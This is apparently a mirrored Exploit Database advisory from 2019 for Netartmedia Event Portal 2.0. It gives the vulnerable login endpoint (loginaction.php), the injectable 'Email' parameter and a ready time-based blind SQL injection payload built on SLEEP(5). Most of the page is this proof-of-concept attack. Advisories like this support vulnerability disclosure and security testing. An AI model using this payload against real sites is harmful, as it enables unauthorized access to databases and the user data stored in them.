Netartmedia Event Portal 2.0 – ‘Email’ SQL Injection

• Exploit Database
• 109 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46560/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection # Date: 19.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.netartmedia.net/eventportal/ # Demo Site: https://www.phpscriptdemos.com/events/ # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description: Event Portal is a a web software (php script), that can be used to create advanced and multi-user event listing and ticket selling websites.   ----- PoC: SQLi (time-based blind) ----- # POST Request: http://localhost/[PATH]/loginaction.php # Vulnerable Parameter: Email # Payload: '||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||'